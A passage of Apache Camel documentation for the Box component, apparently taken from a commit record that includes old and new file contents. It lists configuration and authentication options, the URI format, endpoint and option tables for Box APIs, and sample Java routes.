maximum number of access tokens in cache. | 100 | int\n| *authenticationType* (authentication) | The type of authentication for connection. Types of Authentication: STANDARD_AUTHENTICATION - OAuth 2.0 (3-legged) SERVER_AUTHENTICATION - OAuth 2.0 with JSON Web Tokens | APP_USER_AUTHENTICATION | String\n| *privateKeyFile* (security) | The private key for generating the JWT signature. | | String\n| *privateKeyPassword* (security) | The password for the private key. | | String\n| *publicKeyId* (security) | The ID for public key for validating the JWT signature. | | String\n| *sslContextParameters* (security) | To configure security using SSLContextParameters. | | SSLContextParameters\n| *userName* (security) | Box user name, MUST be provided | | String\n| *userPassword* (security) | Box user password, MUST be provided if authSecureStorage is not set, or returns null on first call | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n=== Spring Boot Auto-Configuration\n\n\nThe component supports 17 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.box.configuration.access-token-cache* | Custom Access Token Cache for storing and retrieving access tokens. | | IAccessTokenCache\n| *camel.component.box.configuration.api-name* | What kind of operation to perform | | BoxApiName\n| *camel.component.box.configuration.authentication-type* | The type of authentication for connection. Types of Authentication: STANDARD_AUTHENTICATION - OAuth 2.0 (3-legged) SERVER_AUTHENTICATION - OAuth 2.0 with JSON Web Tokens | APP_USER_AUTHENTICATION | String\n| *camel.component.box.configuration.client-id* | Box application client ID | | String\n| *camel.component.box.configuration.client-secret* | Box application client secret | | String\n| *camel.component.box.configuration.enterprise-id* | The enterprise ID to use for an App Enterprise. | | String\n| *camel.component.box.configuration.http-params* | Custom HTTP params for settings like proxy host | | Map\n| *camel.component.box.configuration.method-name* | What sub operation to use for the selected operation | | String\n| *camel.component.box.configuration.private-key-file* | The private key for generating the JWT signature. | | String\n| *camel.component.box.configuration.private-key-password* | The password for the private key. | | String\n| *camel.component.box.configuration.public-key-id* | The ID for public key for validating the JWT signature. | | String\n| *camel.component.box.configuration.ssl-context-parameters* | To configure security using SSLContextParameters. | | SSLContextParameters\n| *camel.component.box.configuration.user-id* | The user ID to use for an App User. | | String\n| *camel.component.box.configuration.user-name* | Box user name, MUST be provided | | String\n| *camel.component.box.configuration.user-password* | Box user password, MUST be provided if authSecureStorage is not set, or returns null on first call | | String\n| *camel.component.box.enabled* | Enable box component | true | Boolean\n| *camel.component.box.resolve-property-placeholders* | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n=== URI format\n\n[source]\n----\nbox:apiName\/methodName\n----\n\napiName can be one of:\n\n* collaborations\n* comments\n* event-logs\n* files\n* folders\n* groups\n* events\n* search\n* tasks\n* users\n\n\n=== Producer Endpoints:\n\nProducer endpoints can use endpoint prefixes followed by endpoint names\nand associated options described next. A shorthand alias can be used for\nsome endpoints. The endpoint URI MUST contain a prefix.\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption\u00a0*`inBody`*\u00a0that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format\u00a0*`CamelBox.<option>`*. Note that the\u00a0*`inBody`*\u00a0option\noverrides message header, i.e. the endpoint\noption\u00a0*`inBody=option`*\u00a0would override a\u00a0*`CamelBox.option`*\u00a0header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be\u00a0`null`.\nNote that the\u00a0`null`\u00a0value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of Box API errors the endpoint will throw a\nRuntimeCamelException with a\n*com.box.sdk.BoxAPIException*\u00a0derived exception\ncause.\n\n==== Endpoint Prefix\u00a0_collaborations_\n\nFor more information on Box collaborations see\nhttps:\/\/developer.box.com\/reference#collaboration-object[https:\/\/developer.box.com\/reference#collaboration-object].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`collaborations`*\u00a0as\nfollows:\n\n[source]\n----\nbox:collaborations\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFolderCollaboration |add |folderId, collaborator, role |com.box.sdk.BoxCollaboration\n\n|addFolderCollaborationByEmail |addByEmail |folderId, email, role |com.box.sdk.BoxCollaboration\n\n|deleteCollaboration |delete |collaborationId |\n\n|getFolderCollaborations |collaborations |folderId |java.util.Collection\n\n|getPendingCollaborations |pendingCollaborations | |java.util.Collection\n\n|getCollaborationInfo |info |collaborationId |com.box.sdk.BoxCollaboration.Info\n\n|updateCollaborationInfo |updateInfo |collaborationId, info |com.box.sdk.BoxCollaboration\n|===\n\nURI Options for\u00a0_collaborations_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|collaborationId |String\n\n|collaborator |com.box.sdk.BoxCollaborator\n\n|role |com.box.sdk.BoxCollaboration.Role\n\n|folderId |String\n\n|email |String\n\n|info |com.box.sdk.BoxCollaboration.Info\n|===\n\n==== Endpoint Prefix\u00a0_comments_\n\nFor more information on Box comments see\nhttps:\/\/developer.box.com\/reference#comment-object[https:\/\/developer.box.com\/reference#comment-object].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`comments`*\u00a0as\nfollows:\n\n[source]\n----\nbox:comments\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFileComment |add |fileId, message |com.box.sdk.BoxFile\n\n|changeCommentMessage |updateMessage |commentId, message |com.box.sdk.BoxComment\n\n|deleteComment |delete |commentId |\n\n|getCommentInfo |info |commentId |com.box.sdk.BoxComment.Info\n\n|getFileComments |comments |fileId |java.util.List\n\n|replyToComment |reply |commentId, message |com.box.sdk.BoxComment\n|===\n\nURI Options for\u00a0_collaborations_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|commentId |String\n\n|fileId |String\n\n|message |String\n\n|===\n\n==== Endpoint Prefix\u00a0_events-logs_\n\nFor more information on Box event logs see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nThe following endpoints can be invoked with the prefix\u00a0*`event-logs`*\u00a0as follows:\n\n[source]\n----\nbox:event-logs\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getEnterpriseEvents |events |position, after, before, [types] |java.util.List\n|===\n\nURI Options for\u00a0_event-logs_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|position |String\n\n|after |Date\n\n|before |Date\n\n|types |com.box.sdk.BoxEvent.Types[]\n|===\n\n==== Endpoint Prefix\u00a0_files_\n\nFor more information on Box files see\nhttps:\/\/developer.box.com\/reference#file-object[https:\/\/developer.box.com\/reference#file-object].\nThe following endpoints can be invoked with the\nprefix\u00a0*`files`*\u00a0as follows. \n\n[source]\n----\nbox:files\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|uploadFile |upload |parentFolderId, content, fileName, [created], [modified], [size], [listener] |com.box.sdk.BoxFile\n\n|downloadFile |download |fileId, output, [rangeStart], [rangeEnd], [listener] |java.io.OutputStream\n\n|copyFile |copy |fileId, destinationFolderId, [newName] |com.box.sdk.BoxFile\n\n|moveFile |move |fileId, destinationFolderId, [newName] |com.box.sdk.BoxFile\n\n|renameFile |rename |fileId, newFileName |com.box.sdk.BoxFile \n\n|createFileSharedLink |link |fileId, access, [unshareDate], [permissions] |com.box.sdk.BoxSharedLink\n\n|deleteFile |delete |fileId |\n\n|uploadNewFileVersion |uploadVersion |fileId, fileContent, [modified], [fileSize], [listener] |com.box.boxsdk.BoxFile\n\n|promoteFileVersion |promoteVersion |fileId, version |com.box.sdk.BoxFileVersion\n\n|getFileVersions |versions |fileId |java.util.Collection\n\n|downloadPreviousFileVersion |downloadVersion |fileId, version, output, [listener] |java.io.OutputStream\n\n|deleteFileVersion |deleteVersion |fileId, version |\n\n|getFileInfo |info |fileId, fields |com.box.sdk.BoxFile.Info\n\n|updateFileInfo |updateInfo |fileId, info |com.box.sdk.BoxFile\n\n|createFileMetadata |createMetadata |fileId, metadata, [typeName] |com.box.sdk.Metadata\n\n|getFileMetadata |metadata |fileId, [typeName] |com.box.sdk.Metadata\n\n|updateFileMetadata |updateMetadata |fileId, metadata |com.box.sdk.Metadata\n\n|deleteFileMetadata |deleteMetadata |fileId | \n\n|getDownloadUrl |url |fileId |java.net.URL\n\n|getPreviewLink |preview |fileId |java.net.URL\n\n|getFileThumbnail |thumbnail |fileId, fileType, minWidth, minHeight, maxWidth, maxHeight |byte[]\n|===\n\nURI Options for _files_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|parentFolderId |String\n\n|content |java.io.InputStream\n\n|fileName |String\n\n|created |Date\n\n|modified |Date\n\n|size |Long\n\n|listener |com.box.sdk.ProgressListener \n\n|output |java.io.OutputStream\n\n|rangeStart |Long\n\n|rangeEnd |Long\n\n|outputStreams |java.io.OutputStream[]\n\n|destinationFolderId |String\n\n|newName |String\n\n|fields |String[]\n\n|info |com.box.sdk.BoxFile.Info\n\n|fileSize |Long\n\n|version |Integer\n\n|access |com.box.sdk.BoxSharedLink.Access\n\n|unshareDate |Date\n\n|permissions |com.box.sdk.BoxSharedLink.Permissions\n\n|fileType |com.box.sdk.BoxFile.ThumbnailFileType\n\n|minWidth |Integer\n\n|minHeight |Integer\n\n|maxWidth |Integer\n\n|maxHeight |Integer\n\n|metadata |com.box.sdk.Metadata\n\n|typeName |String\n|===\n\n==== Endpoint Prefix _folders_\n\nFor more information on Box folders see\nhttps:\/\/developer.box.com\/reference#folder-object[https:\/\/developer.box.com\/reference#folder-object].\nThe following endpoints can be invoked with the prefix\n*`folders`*\u00a0as follows. \n\n[source]\n----\nbox:folders\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getRootFolder |root | |com.box.sdk.BoxFolder\n\n|createFolder |create |parentFolderId, folderName |com.box.sdk.BoxFolder\n\n|createFolder |create |parentFolderId, path |com.box.sdk.BoxFolder\n\n|copyFolder |copy |folderId, destinationfolderId, [newName] |com.box.sdk.BoxFolder \n\n|moveFolder |move |folderId, destinationFolderId, newName |com.box.sdk.BoxFolder\n\n|renameFolder |rename |folderId, newFolderName |com.box.sdk.BoxFolder\n\n|createFolderSharedLink |link |folderId, access, [unsharedDate], [permissions] |java.util.List\n\n|deleteFolder |delete |folderId |\n\n|getFolder |folder |path |com.box.sdk.BoxFolder\n\n|getFolderInfo |info |folderId, fields |com.box.sdk.BoxFolder.Info\n\n|getFolderItems |items |folderId, offset, limit, fields |java.util.List\n\n|updateFolderInfo |updateInfo |folderId, info |com.box.sdk.BoxFolder\n|===\n\nURI Options for _folders_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|path |String[]\n\n|folderId |String\n\n|offset |Long\n\n|limit |Long\n\n|fields |String[]\n\n|parentFolderId |String\n\n|folderName |String\n\n|destinationFolderId |String\n\n|newName |String\n\n|newFolderName |String\n\n|info |String\n\n|access |com.box.sdk.BoxSharedLink.Access\n\n|unshareDate |Date\n\n|permissions |com.box.sdk.BoxSharedLink.Permissions\n|===\n\n==== Endpoint Prefix\u00a0_groups_\n\nFor more information on Box groups see\nhttps:\/\/developer.box.com\/reference#group-object[https:\/\/developer.box.com\/reference#group-object].\nThe following endpoints can be invoked with the prefix\u00a0*`groups`*\u00a0as\nfollows:\n\n[source]\n----\nbox:groups\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|createGroup |create |name, [provenance, externalSyncIdentifier, description, invitabilityLevel, memberViewabilityLevel] |com.box.sdk.BoxGroup \n\n|addGroupMembership |createMembership |groupId, userId, role |com.box.sdk.BoxGroupMembership\n\n|deleteGroup |delete |groupId |\n\n|getAllGroups |groups | |java.util.Collection\n\n|getGroupInfo |info |groupId |com.box.sdk.BoxGroup.Info\n\n|updateGroupInfo |updateInfo |groupId, groupInfo |com.box.sdk.BoxGroup\n\n|addGroupMembership |addMembership |groupId, userId, role |com.box.sdk.BoxGroupMembership\n\n|deleteGroupMembership |deleteMembership |groupMembershipId |\n\n|getGroupMemberships |memberships |groupId |java.uti.Collection\n\n|getGroupMembershipInfo |membershipInfo |groupMemebershipId |com.box.sdk.BoxGroup.Info\n\n|updateGroupMembershipInfo |updateMembershipInfo |groupMemebershipId, info |com.box.sdk.BoxGroupMembership\n|===\n\nURI Options for\u00a0_groups_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|name |String\n\n|groupId |String\n\n|userId |String\n\n|role |com.box.sdk.BoxGroupMembership.Role\n\n|groupMembershipId |String\n\n|info |com.box.sdk.BoxGroupMembership.Info\n\n|===\n\n==== Endpoint Prefix\u00a0_search_\n\nFor more information on Box search API see\nhttps:\/\/developer.box.com\/reference#searching-for-content[https:\/\/developer.box.com\/reference#searching-for-content].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`search`*\u00a0as\nfollows:\n\n[source]\n----\nbox:search\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|searchFolder |search |folderId, query |java.util.Collection\n|===\n\nURI Options for\u00a0_search_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|folderId |String\n\n|query |String\n|===\n\n==== Endpoint Prefix\u00a0_tasks_\n\nFor information on Box tasks see\nhttps:\/\/developer.box.com\/reference#task-object-1[https:\/\/developer.box.com\/reference#task-object-1].\nThe following endpoints can be invoked with the prefix\u00a0*`tasks`*\u00a0as\nfollows:\n\n[source]\n----\nbox:tasks\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFileTask |add |fileId, action, dueAt, [message] |com.box.sdk.BoxUser\n\n|deleteTask |delete |taskId |\n\n|getFileTasks |tasks |fileId |java.util.List\n\n|getTaskInfo |info |taskId |com.box.sdk.BoxTask.Info\n\n|updateTaskInfo |updateInfo |taskId, info |com.box.sdk.BoxTask\n\n|addAssignmentToTask |addAssignment |taskId, assignTo |com.box.sdk.BoxTask\n\n|deleteTaskAssignment |deleteAssignment |taskAssignmentId |\n\n|getTaskAssignments |assignments | taskId |java.util.List\n\n|getTaskAssignmentInfo |assignmentInfo |taskAssignmentId |com.box.sdk.BoxTaskAssignment.Info\n|===\n\nURI Options for\u00a0_tasks_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|fileId |String\n\n|action |com.box.sdk.BoxTask.Action\n\n|dueAt |Date\n\n|message |String\n\n|taskId |String\n\n|info |com.box.sdk.BoxTask.Info\n\n|assignTo |com.box.sdk.BoxUser\n\n|taskAssignmentId |String\n|===\n\n==== Endpoint Prefix\u00a0_users_\n\nFor information on Box users see\nhttps:\/\/developer.box.com\/reference#user-object[https:\/\/developer.box.com\/reference#user-object].\nThe following endpoints can be invoked with the prefix\u00a0*`users`*\u00a0as\nfollows:\n\n[source]\n----\nbox:users\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|getCurrentUser |currentUser | |com.box.sdk.BoxUser\n\n|getAllEnterpriseOrExternalUsers |users |filterTerm, [fields] |com.box.sdk.BoxUser\n\n|createAppUser |create |name, [params] |com.box.sdk.BoxUser\n\n|createEnterpriseUser |create |login, name, [params] |com.box.sdk.BoxUser\n\n|deleteUser |delete |userId, notifyUser, force |\n\n|getUserEmailAlias |emailAlias |userId |com.box.sdk.BoxUser\n\n|deleteUserEmailAlias |deleteEmailAlias |userId, emailAliasId |java.util.List\n\n|getUserInfo |info | userId |com.box.sdk.BoxUser.Info\n\n|updateUserInfo |updateInfo |userId, info |com.box.sdk.BoxUser\n\n|moveFolderToUser |- |userId, sourceUserId |com.box.sdk.BoxFolder.Info\n|===\n\nURI Options for\u00a0_users_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|defaultRequest |com.box.restclientv2.requestsbase.BoxDefaultRequestObject\n\n|emailAliasRequest |com.box.boxjavalibv2.requests.requestobjects.BoxEmailAliasRequestObject\n\n|emailId |String\n\n|filterTerm |String\n\n|folderId |String\n\n|simpleUserRequest |com.box.boxjavalibv2.requests.requestobjects.BoxSimpleUserRequestObject\n\n|userDeleteRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserDeleteRequestObject\n\n|userId |String\n\n|userRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserRequestObject\n\n|userUpdateLoginRequest |com.box.boxjavalibv2.requests.requestobjects.BoxUserUpdateLoginRequestObject\n|===\n\n=== Consumer Endpoints:\n\nFor more information on Box events see\nhttps:\/\/developer.box.com\/reference#events[https:\/\/developer.box.com\/reference#events].\nConsumer endpoints can only use the endpoint prefix *events* as\nshown in the example next.\n\n[source]\n----\nbox:events\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|events | |[startingPosition] |com.box.sdk.BoxEvent \n|===\n\nURI Options for\u00a0_events_\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\",]\n|===\n|Name |Type\n\n|startingPosition |Long\n|===\n\n=== Message header\n\nAny of the options\u00a0can be provided in a message header for producer\nendpoints with *CamelBox.* prefix.\n\n=== Message body\n\nAll result message bodies utilize objects provided by the Box Java SDK.\nProducer endpoints can specify the option name for incoming message body\nin the *inBody* endpoint parameter.\n\n=== Samples\n\nThe following route uploads new files to the user's root folder:\n\n[source,java]\n----\nfrom(\"file:...\")\n .to(\"box:\/\/files\/upload\/inBody=fileUploadRequest\");\n----\n\nThe following route polls user's account for updates:\n\n[source,java]\n----\nfrom(\"box:\/\/events\/listen?startingPosition=-1\")\n .to(\"bean:blah\");\n----\n\nThe following route uses a producer with dynamic header options.\u00a0The\n*fileId*\u00a0property has the Box file id and the *output* property has \nthe output stream of the file contents, so they are assigned to the\n*CamelBox.fileId* header and *CamelBox.output* header respectively\nas follows:\n\n[source,java]\n----\nfrom(\"direct:foo\")\n .setHeader(\"CamelBox.fileId\", header(\"fileId\"))\n .setHeader(\"CamelBox.output\", header(\"output\"))\n .to(\"box:\/\/files\/download\")\n .to(\"file:\/\/...\");\n----\n","old_contents":"[[box-component]]\n== Box Component\n\n*Available as of Camel version 2.14*\n\nThe Box component provides access to all of the Box.com APIs accessible\nusing https:\/\/github.com\/box\/box-java-sdk\/[https:\/\/github.com\/box\/box-java-sdk]. It\nallows producing messages to upload and download files, create, edit,\nand manage folders, etc. It also supports APIs that allow polling for\nupdates to user accounts and even changes to enterprise accounts, etc.\n\nBox.com requires the use of OAuth2.0 for all client application\nauthentication. In order to use camel-box with your account, you'll need\nto create a new application within Box.com at\nhttps:\/\/developer.box.com\/[https:\/\/developer.box.com].\nThe Box application's client id and secret will allow access to Box APIs\nwhich require a current user. A user access token is generated and\nmanaged by the API for an end user. \n\nMaven users will need to add the following dependency to their pom.xml\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-box<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n----\n\n=== Connection Authentication Types\n\nThe Box component supports three different types of authenticated connections.\n\n==== Standard Authentication\n\n*Standard Authentication* uses the *OAuth 2.0 three-legged authentication process* to authenticate its connections with Box.com. This type of authentication enables Box *managed users* and *external users* to access, edit, and save their Box content through the Box component.\n\n==== App Enterprise Authentication\n\n*App Enterprise Authentication* uses the *OAuth 2.0 with JSON Web Tokens (JWT)* to authenticate its connections as a *Service Account* for a *Box Application*. This type of authentication enables a service account to access, edit, and save the Box content of its *Box Application* through the Box component.\n\n==== App User Authentication\n\n*App User Authentication* uses the *OAuth 2.0 with JSON Web Tokens (JWT)* to authenticate its connections as an *App User* for a *Box Application*. This type of authentication enables app users to access, edit, and save their Box content in its *Box Application* through the Box component.\n\n=== Box Options\n\n\/\/ component options: START\nThe Box component supports 2 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *configuration* (common) | To use the shared configuration | | BoxConfiguration\n| *resolveProperty Placeholders* (advanced) | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | boolean\n|===\n\/\/ component options: END\n\n\/\/ endpoint options: START\nThe Box endpoint is configured using URI syntax:\n\n----\nbox:apiName\/methodName\n----\n\nwith the following path and query parameters:\n\n==== Path Parameters (2 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *apiName* | *Required* What kind of operation to perform | | BoxApiName\n| *methodName* | *Required* What sub operation to use for the selected operation | | String\n|===\n\n\n==== Query Parameters (20 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *clientId* (common) | Box application client ID | | String\n| *enterpriseId* (common) | The enterprise ID to use for an App Enterprise. | | String\n| *inBody* (common) | Sets the name of a parameter to be passed in the exchange In Body | | String\n| *userId* (common) | The user ID to use for an App User. | | String\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *httpParams* (advanced) | Custom HTTP params for settings like proxy host | | Map\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *accessTokenCache* (security) | Custom Access Token Cache for storing and retrieving access tokens. | | IAccessTokenCache\n| *clientSecret* (security) | Box application client secret | | String\n| *encryptionAlgorithm* (security) | The type of encryption algorithm for JWT. Supported Algorithms: RSA_SHA_256 RSA_SHA_384 RSA_SHA_512 | RSA_SHA_256 | EncryptionAlgorithm\n| *maxCacheEntries* (security) | The maximum number of access tokens in cache. | 100 | int\n| *authenticationType* (authentication) | The type of authentication for connection. Types of Authentication: STANDARD_AUTHENTICATION - OAuth 2.0 (3-legged) SERVER_AUTHENTICATION - OAuth 2.0 with JSON Web Tokens | APP_USER_AUTHENTICATION | String\n| *privateKeyFile* (security) | The private key for generating the JWT signature. | | String\n| *privateKeyPassword* (security) | The password for the private key. | | String\n| *publicKeyId* (security) | The ID for public key for validating the JWT signature. | | String\n| *sslContextParameters* (security) | To configure security using SSLContextParameters. | | SSLContextParameters\n| *userName* (security) | Box user name, MUST be provided | | String\n| *userPassword* (security) | Box user password, MUST be provided if authSecureStorage is not set, or returns null on first call | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n=== Spring Boot Auto-Configuration\n\n\nThe component supports 17 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.box.configuration.access-token-cache* | Custom Access Token Cache for storing and retrieving access tokens. | | IAccessTokenCache\n| *camel.component.box.configuration.api-name* | What kind of operation to perform | | BoxApiName\n| *camel.component.box.configuration.authentication-type* | The type of authentication for connection. Types of Authentication: STANDARD_AUTHENTICATION - OAuth 2.0 (3-legged) SERVER_AUTHENTICATION - OAuth 2.0 with JSON Web Tokens | APP_USER_AUTHENTICATION | String\n| *camel.component.box.configuration.client-id* | Box application client ID | | String\n| *camel.component.box.configuration.client-secret* | Box application client secret | | String\n| *camel.component.box.configuration.enterprise-id* | The enterprise ID to use for an App Enterprise. | | String\n| *camel.component.box.configuration.http-params* | Custom HTTP params for settings like proxy host | | Map\n| *camel.component.box.configuration.method-name* | What sub operation to use for the selected operation | | String\n| *camel.component.box.configuration.private-key-file* | The private key for generating the JWT signature. | | String\n| *camel.component.box.configuration.private-key-password* | The password for the private key. | | String\n| *camel.component.box.configuration.public-key-id* | The ID for public key for validating the JWT signature. | | String\n| *camel.component.box.configuration.ssl-context-parameters* | To configure security using SSLContextParameters. | | SSLContextParameters\n| *camel.component.box.configuration.user-id* | The user ID to use for an App User. | | String\n| *camel.component.box.configuration.user-name* | Box user name, MUST be provided | | String\n| *camel.component.box.configuration.user-password* | Box user password, MUST be provided if authSecureStorage is not set, or returns null on first call | | String\n| *camel.component.box.enabled* | Enable box component | true | Boolean\n| *camel.component.box.resolve-property-placeholders* | Whether the component should resolve property placeholders on itself when starting. Only properties which are of String type can use property placeholders. | true | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n=== URI format\n\n[source]\n----\nbox:apiName\/methodName\n----\n\napiName can be one of:\n\n* collaborations\n* comments\n* event-logs\n* files\n* folders\n* groups\n* events\n* search\n* tasks\n* users\n\n\n=== Producer Endpoints:\n\nProducer endpoints can use endpoint prefixes followed by endpoint names\nand associated options described next. A shorthand alias can be used for\nsome endpoints. The endpoint URI MUST contain a prefix.\n\nEndpoint options that are not mandatory are denoted by *[]*. When there\nare no mandatory options for an endpoint, one of the set of *[]* options\nMUST be provided. Producer endpoints can also use a special\noption\u00a0*`inBody`*\u00a0that in turn should contain the name of the endpoint\noption whose value will be contained in the Camel Exchange In message.\n\nAny of the endpoint options can be provided in either the endpoint URI,\nor dynamically in a message header. The message header name must be of\nthe format\u00a0*`CamelBox.<option>`*. Note that the\u00a0*`inBody`*\u00a0option\noverrides message header, i.e. the endpoint\noption\u00a0*`inBody=option`*\u00a0would override a\u00a0*`CamelBox.option`*\u00a0header.\n\nIf a value is not provided for the option *defaultRequest* either in the\nendpoint URI or in a message header, it will be assumed to be\u00a0`null`.\nNote that the\u00a0`null`\u00a0value will only be used if other options do not\nsatisfy matching endpoints.\n\nIn case of Box API errors the endpoint will throw a\nRuntimeCamelException with a\n*com.box.sdk.BoxAPIException*\u00a0derived exception\ncause.\n\n==== Endpoint Prefix\u00a0_collaborations_\n\nFor more information on Box collaborations see\nhttps:\/\/developer.box.com\/reference#collaboration-object[https:\/\/developer.box.com\/reference#collaboration-object].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`collaborations`*\u00a0as\nfollows:\n\n[source]\n----\nbox:collaborations\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFolderCollaboration |add |folderId, collaborator, role |com.box.sdk.BoxCollaboration\n\n|addFolderCollaborationByEmail |addByEmail |folderId, email, role |com.box.sdk.BoxCollaboration\n\n|deleteCollaboration |delete |collaborationId |\n\n|getFolderCollaborations |collaborations |folderId |java.util.Collection\n\n|getPendingCollaborations |pendingCollaborations | |java.util.Collection\n\n|getCollaborationInfo |info |collaborationId |com.box.sdk.BoxCollaboration.Info\n\n|updateCollaborationInfo |updateInfo |collaborationId, info |com.box.sdk.BoxCollaboration\n|===\n\nURI Options for\u00a0_collaborations_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|collaborationId |String\n\n|collaborator |com.box.sdk.BoxCollaborator\n\n|role |com.box.sdk.BoxCollaboration.Role\n\n|folderId |String\n\n|email |String\n\n|info |com.box.sdk.BoxCollaboration.Info\n|===\n\n==== Endpoint Prefix\u00a0_comments_\n\nFor more information on Box comments see\nhttps:\/\/developer.box.com\/reference#comment-object[https:\/\/developer.box.com\/reference#comment-object].\u00a0The\nfollowing endpoints can be invoked with the prefix\u00a0*`comments`*\u00a0as\nfollows:\n\n[source]\n----\nbox:comments\/endpoint?[options]\n----\n\n[width=\"100%\",cols=\"10%,10%,10%,70%\",options=\"header\"]\n|===\n|Endpoint |Shorthand Alias |Options |Result Body Type\n\n|addFileComment |add |fileId, message |com.box.sdk.BoxFile\n\n|changeCommentMessage |updateMessage |commentId, message |com.box.sdk.BoxComment\n\n|deleteComment |delete |commentId |\n\n|getCommentInfo |info |commentId |com.box.sdk.BoxComment.Info\n\n|getFileComments |comments |fileId |java.util.List\n\n|replyToComment |reply |commentId, message |com.box.sdk.BoxComment\n|===\n\nURI Options for\u00a0_collaborations_\n\n\n[width=\"100%\",cols=\"10%,90%\",options=\"header\"]\n|===\n|Name |Type\n\n|commentId |String\n\n|fileId |String\n\n|message |String\n\n|===\n\n==== Endpoint Prefix\u00a0_events-logs_\n\nFor more information on Box event logs 